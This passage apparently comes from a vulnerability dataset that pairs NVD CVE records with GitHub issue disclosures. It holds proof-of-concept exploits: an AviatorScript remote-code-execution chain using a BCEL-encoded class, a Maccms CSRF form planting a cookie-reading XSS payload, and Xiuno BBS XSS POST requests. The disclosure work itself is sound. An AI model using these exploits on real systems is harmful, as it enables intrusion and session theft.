}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/killme2008/aviatorscript/issues/421" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/killme2008/aviatorscript/issues/421" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:aviatorscript_project:aviatorscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "7DDED762-B8E7-4804-ACB3-584A54F66A6C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.2.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/killme2008/aviatorscript/issues/421
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "killme2008", "aviatorscript" ]
The new object can be directly entered when entering the aviator expression, but it is not allowed to call non-public static methods. You can use the BCELClassloader to load the BCEL code to complete the RCE. First prepare a malicious evil.class. Set the public static method exec to execute arbitrary commands. (输入aviator表达式时可以直接new对象,但是不允许调用非public static的方法。可以使用BCELClassloader加载BCEL编码的形式完成RCE。 首先准备一个恶意的evil.class。设置public static方法exec来执行任意命令。) ```java import java.io.IOException; public class evil { public static Process exec(String cmd) throws IOException { return Runtime.getRuntime().exec(cmd); } } ``` Then encode it in BCEL. (然后将其BCEL编码。) ```java import com.sun.org.apache.bcel.internal.classfile.Utility; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; public class BCELencode { public static void main(String []args) throws Exception{ Path path = Paths.get("evil.class"); byte[] data = Files.readAllBytes(path); String s = Utility.encode(data,true); System.out.print("$$BCEL$$"+s); } } ``` Prepare the vulnerability environment. Use the latest version of aviatorscript. (准备漏洞环境。使用最新版的aviatorscript。) ``` <dependencies> <dependency> <groupId>com.googlecode.aviator</groupId> <artifactId>aviator</artifactId> <version>5.3.0-beta</version> </dependency> </dependencies> ``` Perform aviator expression injection. (进行aviator表达式注入。) ```java import com.googlecode.aviator.AviatorEvaluator; import com.googlecode.aviator.AviatorEvaluatorInstance; public class test { public static void main(String[] args) { AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance(); evaluator.execute("'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );"); } } ``` The command was executed successfully. (成功执行命令。) ![Calc](https://user-images.githubusercontent.com/32768214/135420784-fc4ef065-15de-401a-aeb1-697fc853d0eb.png)
There is a critical expression injection RCE vulnerability in this expression engine(该表达式引擎存在表达式注入漏洞)
https://api.github.com/repos/killme2008/aviatorscript/issues/421/comments
9
2021-09-30T09:20:15Z
2021-10-12T08:33:05Z
https://github.com/killme2008/aviatorscript/issues/421
1,011,934,162
421
2,654
CVE-2020-21386
2021-10-04T20:15:07.593
A Cross-Site Request Forgery (CSRF) in the component admin.php/admin/type/info.html of Maccms 10 allows attackers to gain administrator privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "E1258FF8-1AB2-4A53-88A6-58685BDFEA73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/magicblack/maccms10/issues/126
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
After the administrator logged in, open the following page,which will add a classification. test2.html---add a classification. Insert payload in the “type_en”. ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.3/admin.php/admin/type/info.html" method="POST"> <input type="hidden" name="type&#95;id" value="" /> <input type="hidden" name="type&#95;mid" value="1" /> <input type="hidden" name="type&#95;pid" value="0" /> <input type="hidden" name="type&#95;status" value="0" /> <input type="hidden" name="type&#95;sort" value="2" /> <input type="hidden" name="type&#95;name" value="test1" /> <input type="hidden" name="type&#95;en" value="&quot;&#32;onmouseover&#61;alert&#40;document&#46;cookie&#41;&#32;&quot;" /> <input type="hidden" name="type&#95;tpl" value="type&#46;html" /> <input type="hidden" name="type&#95;tpl&#95;list" value="show&#46;html" /> <input type="hidden" name="type&#95;tpl&#95;detail" value="detail&#46;html" /> <input type="hidden" name="type&#95;tpl&#95;play" value="" /> <input type="hidden" name="type&#95;tpl&#95;down" value="" /> <input type="hidden" name="type&#95;title" value="" /> <input type="hidden" name="type&#95;key" value="" /> <input type="hidden" name="type&#95;des" value="" /> <input type="hidden" name="type&#95;logo" value="" /> <input type="hidden" name="type&#95;pic" value="" /> <input type="hidden" name="type&#95;jumpurl" value="" /> <input type="hidden" name="type&#95;extend&#91;class&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;area&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;lang&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;year&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;star&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;director&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;state&#93;" value="" /> <input type="hidden" name="type&#95;extend&#91;version&#93;" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Then, the “english name” will be modified to " onmouseover=alert(document.cookie) ". We can see the result. ![image](https://user-images.githubusercontent.com/41558659/69527951-4da80200-0fa8-11ea-86c6-fed598f00655.png) The attacker can use this vulnerability to obtain the administrator's cookie. Then he will get the administrator's privileges!
There is a CSRF vulnerability and XSS vulnerability via admin.php/admin/type/info.html that can get the administrator's privileges
https://api.github.com/repos/magicblack/maccms10/issues/126/comments
3
2019-11-25T09:32:04Z
2021-10-05T13:44:39Z
https://github.com/magicblack/maccms10/issues/126
527,958,811
126
2,655
CVE-2020-21494
2021-10-04T21:15:12.387
A cross-site scripting (XSS) vulnerability in the component install\install.sql of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via changing the doctype value to 0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/xiuno/xiunobbs/issues/I16BHH" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wanghaiwei/xiuno-docker/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/xiuno/xiunobbs/issues/I16BHH" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wanghaiwei/xiuno-docker/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiuno:xiunobbs:4.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "EA2DCB39-3365-46B2-8A31-CE8CC69E911F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wanghaiwei/xiuno-docker/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wanghaiwei", "xiuno-docker" ]
URL:http://127.0.0.1/?thread-1.htm route\thread.php line 52-53; ``` $message = param('message', '', FALSE); empty($message) AND message('message', lang('please_input_message')); $doctype = param('doctype', 0); $doctype > 10 AND message(-1, lang('doc_type_not_supported')); xn_strlen($message) > 2028000 AND message('message', lang('message_too_long')); ``` xiunophp\misc.func.php line 201-209; ``` // txt 转换到 html function xn_txt_to_html($s) { $s = htmlspecialchars($s); $s = str_replace(" ", '&nbsp;', $s); $s = str_replace("\t", ' &nbsp; &nbsp; &nbsp; &nbsp;', $s); $s = str_replace("\r\n", "\n", $s); $s = str_replace("\n", '<br>', $s); return $s; } ``` model\post.func.php line 360-361; ``` $arr['doctype'] == 0 && $arr['message_fmt'] = ($gid == 1 ? $arr['message'] : xn_html_safe($arr['message'])); $arr['doctype'] == 1 && $arr['message_fmt'] = xn_txt_to_html($arr['message']); ``` install\install.sql line 158; ``` doctype tinyint(3) NOT NULL default '0', # 类型,0: html, 1: txt; 2: markdown; 3: ubb ``` #The doctype defaults to 1, The data packet is modified to 0,The xss payload can be triggered. POC: ``` POST /?post-create-1-1.htm HTTP/1.1 Host: 127.0.0.1 Content-Length: 78 Accept: text/plain, */*; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://127.0.0.1/?thread-1.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: bbs_sid=k5j590765ife9s2nsgbspaof2k; bbs_token=E9L_2BPUbwyRHmiH8b_2BOTH0t85UrHKtLAJsTwsbgEpiw_2BLLlN57Bme3iX41pY6_2BeRMMAV7CgGoSWTIEVOBHCbnOA_3D_3D Connection: close doctype=0&return_html=1&quotepid=0&message=%3Cscript%3Ealert(1)%3C%2Fscript%3E ``` ![Default packet](https://user-images.githubusercontent.com/50439612/70364927-cd4ba000-18c9-11ea-972f-72e2b3b88abc.png) ![Modify the doctype parameter to: 0](https://user-images.githubusercontent.com/50439612/70364932-d0df2700-18c9-11ea-874d-c91e790b499d.png) ![Trigger Vulnerability](https://user-images.githubusercontent.com/50439612/70364933-d3418100-18c9-11ea-9ae6-354f683cead3.png) 存储跨站脚本攻击(XSS)漏洞 URL:http://127.0.0.1/?thread-1.htm route\thread.php 第52-53行; ``` $message = param('message', '', FALSE); empty($message) AND message('message', lang('please_input_message')); $doctype = param('doctype', 0); $doctype > 10 AND message(-1, lang('doc_type_not_supported')); xn_strlen($message) > 2028000 AND message('message', lang('message_too_long')); ``` xiunophp\misc.func.php 第201-209行; ``` // txt 转换到 html function xn_txt_to_html($s) { $s = htmlspecialchars($s); $s = str_replace(" ", '&nbsp;', $s); $s = str_replace("\t", ' &nbsp; &nbsp; &nbsp; &nbsp;', $s); $s = str_replace("\r\n", "\n", $s); $s = str_replace("\n", '<br>', $s); return $s; } ``` model\post.func.php 第360-361行; ``` $arr['doctype'] == 0 && $arr['message_fmt'] = ($gid == 1 ? $arr['message'] : xn_html_safe($arr['message'])); $arr['doctype'] == 1 && $arr['message_fmt'] = xn_txt_to_html($arr['message']); ``` install\install.sql 第158行; ``` doctype tinyint(3) NOT NULL default '0', # 类型,0: html, 1: txt; 2: markdown; 3: ubb ``` #doctype默认为1,构造数据包修改为0.即可触发xss payload. POC: ``` POST /?post-create-1-1.htm HTTP/1.1 Host: 127.0.0.1 Content-Length: 78 Accept: text/plain, */*; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://127.0.0.1/?thread-1.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: bbs_sid=k5j590765ife9s2nsgbspaof2k; bbs_token=E9L_2BPUbwyRHmiH8b_2BOTH0t85UrHKtLAJsTwsbgEpiw_2BLLlN57Bme3iX41pY6_2BeRMMAV7CgGoSWTIEVOBHCbnOA_3D_3D Connection: close doctype=0&return_html=1&quotepid=0&message=%3Cscript%3Ealert(1)%3C%2Fscript%3E ```
Storage Cross-Site Scripting Attack (XSS) Vulnerability
https://api.github.com/repos/rayfalling/xiuno-docker/issues/4/comments
1
2019-12-07T00:18:13Z
2020-01-01T11:03:58Z
https://github.com/rayfalling/xiuno-docker/issues/4
534,318,451
4
2,656
CVE-2020-21495
2021-10-04T21:15:12.427
A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitename parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/xiuno/xiunobbs/issues/I16BI3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wanghaiwei/xiuno-docker/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/xiuno/xiunobbs/issues/I16BI3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wanghaiwei/xiuno-docker/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiuno:xiunobbs:4.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "EA2DCB39-3365-46B2-8A31-CE8CC69E911F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wanghaiwei/xiuno-docker/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wanghaiwei", "xiuno-docker" ]
/admin/?setting-base.htm sitename sitebrief lang\zh-cn\bbs_admin.php line 73-74; ``` 'sitename'=>'站点名称', 'sitebrief'=>'站点介绍', ``` admin\route\index.php line 96-108; ``` function get_last_version($stat) { global $conf, $time; $last_version = kv_get('last_version'); if($time - $last_version > 86400) { kv_set('last_version', $time); $sitename = urlencode($conf['sitename']); $sitedomain = urlencode(http_url_path()); $version = urlencode($conf['version']); return '<script src="http://custom.xiuno.com/version.htm?sitename='.$sitename.'&sitedomain='.$sitedomain.'&users='.$stat['users'].'&threads='.$stat['threads'].'&posts='.$stat['posts'].'&version='.$version.'"></script>'; } else { return ''; } } ``` route\thread.php line 129; ``` $header['title'] = $thread['subject'].'-'.$forum['name'].'-'.$conf['sitename']; ``` admin\route\setting.php line 37-57; ``` $sitebrief = param('sitebrief', '', FALSE); $sitename = param('sitename', '', FALSE); $runlevel = param('runlevel', 0); $user_create_on = param('user_create_on', 0); $user_create_email_on = param('user_create_email_on', 0); $user_resetpw_on = param('user_resetpw_on', 0); $_lang = param('lang'); // hook admin_setting_base_post_start.php $replace = array(); $replace['sitename'] = $sitename; $replace['sitebrief'] = $sitebrief; $replace['runlevel'] = $runlevel; $replace['user_create_on'] = $user_create_on; $replace['user_create_email_on'] = $user_create_email_on; $replace['user_resetpw_on'] = $user_resetpw_on; $replace['lang'] = $_lang; file_replace_var(APP_PATH.'conf/conf.php', $replace); ``` conf\conf.default.php line 78-79; ``` 'sitename' => 'Xiuno BBS', 'sitebrief' => 'Site Brief', ``` index.inc.php line 31-38; ``` $header = array( 'title'=>$conf['sitename'], 'mobile_title'=>'', 'mobile_link'=>'./', 'keywords'=>'', // 搜索引擎自行分析 keywords, 自己指定没用 / Search engine automatic analysis of key words, so keep it empty. 'description'=>strip_tags($conf['sitebrief']), 'navs'=>array(), ); ``` poc: ``` POST /xiunobbs/admin/?setting-base.htm HTTP/1.1 Host: 192.168.1.5 Content-Length: 189 Accept: text/plain, */*; q=0.01 Origin: http://192.168.1.5 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.1.5/xiunobbs/admin/?setting-base.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: bbs_admin_token=ZzVAtms8nWG2nHqcNriSe21p7pbGQ1rNFuvZyA_3D_3D; bbs_sid=k5j590765ife9s2nsgbspaof2k; bbs_token=E9L_2BPUbwyRHmiH8b_2BOTH0t85UrHKtLAJsTwsbgEpiw_2BLLlN57Bme3iX41pY6_2BeRMMAV7CgGoSWTIEVOBHCbnOA_3D_3D Connection: close sitename=%3Cscript%3Ealert('sitename')%3C%2Fscript%3E&sitebrief=%3Cscript%3Ealert('sitebrief')%3C%2Fscript%3E&runlevel=5&user_create_on=1&user_create_email_on=0&user_resetpw_on=0&lang=zh-cn ``` ![1](https://user-images.githubusercontent.com/50439612/70366137-27e7fa80-18d0-11ea-98fb-28220cde26e3.png) ![2](https://user-images.githubusercontent.com/50439612/70366140-2a4a5480-18d0-11ea-8450-44672bdc7663.png) ![3](https://user-images.githubusercontent.com/50439612/70366142-2c141800-18d0-11ea-9715-b59b70dd65bc.png)
Storage Cross-Site Scripting Attack (XSS) Vulnerability
https://api.github.com/repos/rayfalling/xiuno-docker/issues/5/comments
2
2019-12-07T01:01:39Z
2020-01-01T11:03:58Z
https://github.com/rayfalling/xiuno-docker/issues/5
534,329,574
5
2,657
CVE-2021-42006
2021-10-04T23:15:08.630
An out-of-bounds access in GffLine::GffLine in gff.cpp in GCLib 0.12.7 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted GFF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpertea/gclib/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpertea/gclib/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gclib_project:gclib:0.12.7:*:*:*:*:*:*:*", "matchCriteriaId": "4D1CF99B-2C85-40C4-B5AE-C5FC59194725", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpertea/gclib/issues/11
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpertea", "gclib" ]
# Reproduce **PoC Input**: [min.gz](https://github.com/gpertea/gclib/files/7279031/min.gz) **Steps to Reproduce:** 1. Compile [GffRead v0.12.7](https://github.com/gpertea/gffread/releases/tag/v0.12.7) (will fetch GCLib v0.12.7) 2. Decompress PoC input: `gzip -d min.gz` 3. Run: `./gffread -E min -o out` **Output:** ```text Command line was: ./gffread -E min -o out Segmentation fault ``` # Root Cause https://github.com/gpertea/gclib/blob/8aee376774ccb2f3bd3f8e3bf1c9df1528ac7c5b/gff.cpp#L413-L432 When GCLib reads a GFF line with no info segment, the `char *` at `t[8]` will not be set, causing it to take on whatever stale value happens to be in that location of the stack. Triggered accidentally, this can cause a segfault due to reading an invalid address here: https://github.com/gpertea/gclib/blob/8aee376774ccb2f3bd3f8e3bf1c9df1528ac7c5b/gff.cpp#L118 However, a maliciously crafted input may be able to place a valid pointer at this location, causing a more severe vulnerability. # Proposed Patch At a minimum, `t` should be zeroed during initialization: ```patch *** v0.12.7/gclib/gff.cpp 2021-07-23 10:31:39.000000000 -0400 --- new/gclib/gff.cpp 2021-10-04 10:54:52.989309121 -0400 *************** GffLine::GffLine(GffReader* reader, cons *** 405,411 **** GMALLOC(dupline, llen+1); memcpy(dupline, l, llen+1); skipLine=true; //clear only if we make it to the end of this function ! char* t[9]; int i=0; int tidx=1; t[0]=line; --- 405,411 ---- GMALLOC(dupline, llen+1); memcpy(dupline, l, llen+1); skipLine=true; //clear only if we make it to the end of this function ! char* t[9] = {0}; int i=0; int tidx=1; t[0]=line; ``` Ideally, the library should gracefully handle no info being found (this only works if `t` is zero initialized): ```patch *** v0.12.7/gclib/gff.cpp 2021-07-23 10:31:39.000000000 -0400 --- new/gclib/gff.cpp 2021-10-04 10:54:52.989309121 -0400 *************** GffLine::GffLine(GffReader* reader, cons *** 430,435 **** --- 430,439 ---- track=t[1]; ftype=t[2]; info=t[8]; + if (!info) { + GMessage("Warning: missing info:\n%s\n",l); + return; + } char* p=t[3]; if (!parseUInt(p,fstart)) { //chromosome_band entries in Flybase ``` # Credit This bug was detected using [AFL](https://github.com/google/AFL) and localized using [ARCUS](https://github.com/carter-yagemann/arcus).
Uninitialized GFF line info causes out-of-bounds-read, possible out-of-bounds-write.
https://api.github.com/repos/gpertea/gclib/issues/11/comments
1
2021-10-04T15:26:20Z
2021-10-11T08:07:59Z
https://github.com/gpertea/gclib/issues/11
1,015,322,609
11
2,658
CVE-2020-21503
2021-10-05T22:15:07.613
waimai Super Cms 20150505 has a logic flaw allowing attackers to modify a price, before form submission, by observing data in a packet capture. By setting the index.php?m=gift&a=addsave credit parameter to -1, the product is sold for free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:waimai_super_cms_project:waimai_super_cms:20150505:*:*:*:*:*:*:*", "matchCriteriaId": "9C15A529-8AEB-4B8E-BD27-92CE0CF8E421", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "668" ]
668
https://github.com/caokang/waimai/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "caokang", "waimai" ]
